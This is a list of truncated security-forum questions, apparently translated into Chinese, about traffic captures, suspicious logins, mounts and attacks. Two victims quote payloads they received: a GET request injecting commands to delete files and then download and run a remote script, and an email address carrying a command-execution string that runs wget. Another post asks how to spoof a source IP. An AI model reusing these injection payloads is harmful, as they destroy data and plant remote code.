我正在一个封闭的参考环境中进行经过批准的渗透测试,并遇到了一个看似简单的问题,但我目前无法解决。 当尝试对在 MS Windows 操作系统上运行的易受攻击的 Fermitter FTP 服务器执行目录遍历攻击时,可以在系统根目录上执行 LIST(此处更改的地址和内容列表仅供参考): # ftp 192.168.13.22 Connected to 192.168.13.22. 220 Femitter FTP Server ready. Name (192.168.13.22:root): 331 Password required for root...
我对托管还很陌生,我收到了如下获取请求: GET /goform/webRead/open/?path=|rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F(ip adress)%2Fbruh.sh%3B%20chmod%20777%20bruh.sh%3B%20.%2Fbruh.sh 从外观上看,好像有人试图通过 拉取脚本wget并尝试rm -rf,我应该担心吗? ...
我收到一个Wireshark捕获文件作为任务。其中有3个TCP数据包用于建立连接的TCP三次握手和4个BGP数据包。 我收到了更多信息,现在我必须使用这 7 个数据包来找出发生了哪些 BGP 攻击以及哪些前缀受到了攻击。我已经研究并发现了很多,但我仍然需要一点帮助。 附加信息:这是关于 Bob (1.1.1.1 | AS 65100) 和 Alice (2.2.2.2 | AS 65200) 之间的 BGP 会话。Bob 的前缀为 10.30.0.0/16 和 10.10.0.0/16。 Wireshark .cap 文件导出为文本: No. Tim...
我注意到我的 Linux 机器上安装了一个奇怪的环回文件系统,并对其进行了一些深入研究。对于这里的任何安全专家来说,这看起来像是某种黑客攻击或网络攻击吗?我不知道这是否是询问的合适地方,所以请根据需要/适当地将我引导到其他地方。 我有更多详细信息,但我不想用过多的猜测来过度阐述我的问题。回送安装的映像文件大约为 5.7GB。安装中的文件似乎主要是二进制数据文件,除了 (*)。我运行了 fuser *,目前没有看到任何进程打开了这些文件。 % df | grep loop Filesystem 1K-blocks Used Availab...
最近,我们在某个频段的 Wi-Fi 连接非常糟糕。无论我选择什么设置,在重置后,以及使用各种新旧 Wi-Fi 路由器固件后,我们的连接速度仍然非常非常慢。 也尝试了 WireShark,得到了大量的 TCP 重传和 TCP 虚假重传数据包。 但当我使用 MAC 过滤器并将我们自己的设备列入白名单时,连接就好多了。尽管我们仍然收到“deauth”日志消息。 下面是来自我们 RT-AX92U 路由器的系统日志的片段,现在再次运行最新固件。或者实际上有两个路由器在 AiMesh 模式下运行。 5GHz-2(两个路由器之间通信的“回程”)存在该问题。 还尝...
到防范 BadUSB 按键注入攻击,这似乎是合乎逻辑的需要密码才能以管理员权限访问命令行可以通过修改以下注册表项的“值数据”来实现1: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin 据记载: “当操作需要提升权限时,此选项会提示同意管理员输入其用户名和密码(或其他有效管理员)。此操作在安全桌面上进行” 这将防止通过命令行进行任何未经授权的系统修改。 但是,注册表编辑器本身不需要任何密码来访...
我运营着自己的邮件服务器,时不时有人会向 root 帐户发送垃圾邮件或神秘邮件。最近,我收到了一封空邮件,收件人是: root+${运行{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@我的域名.tld 该字符串中的第二个 IP 地址似乎属于我租用服务器的同一托管服务。跑步和获得在我看来非常可疑,但我在互联网上没有发现任何有关此类攻击的信息。 根据服务器的邮件日志,该邮件是从 148.72.206.111 发送的。然而,从字段设置为[电子邮件保护]。 有人知道这是...
在过去的几个小时里,一些来自中国的机器(好吧,据说)一直试图以 root 身份通过 SSH 进入我的机器,但失败了。其中一些(全部?)IP 如下: 218.65.30.53 221.194.47.221 115.238.245.2 115.238.245.4 221.194.47.239 我使用基于 Web 的 whois 来检查它们,并已向滥用报告地址写信。我应该做什么?在我的机器上和一般情况下? ...
每次我使用 PuTTY 访问我的 VPS 时,都会看到以下内容: Last failed login: Fri Oct 6 17:25:58 UTC 2017 from xx.xxx.xxx.xxx on ssh:notty There were 2381935 failed login attempts since the last successful login. Last login: Tue Sep 26 09:30:02 2017 from xx.xxx.xxx.xxx 我不知道这是否相关,但是当我登录时,需要更多时间来加载,在其他没有像...
我正在为一个安全项目运行一些测试,以下是场景。我有一个 SIP 服务器 (SBC),它接受来自 IP 地址列表的呼叫。我有一个 SIP INVITE 数据包,我想使用伪造的源 IP 地址将其发送到该服务器。我运行 wireshark 并发现我发送正确,但我的路由器将我伪造的源 IP 更改为公共 IP 地址,我找不到绕过此问题的方法。我不关心数据包从哪里发送,也不关心是否收到任何回复。我只想知道如何使用我选择的这个伪造 IP 地址将此数据包发送到目的地。请帮忙! ...
上次 ssh 登录我的服务器似乎是从一台我不认识的计算机进行的。我怎么才能知道那是谁?aaubervilliers-651-1-60-191.w83-200.abo.wanadoo.fr 我不在法国! ...
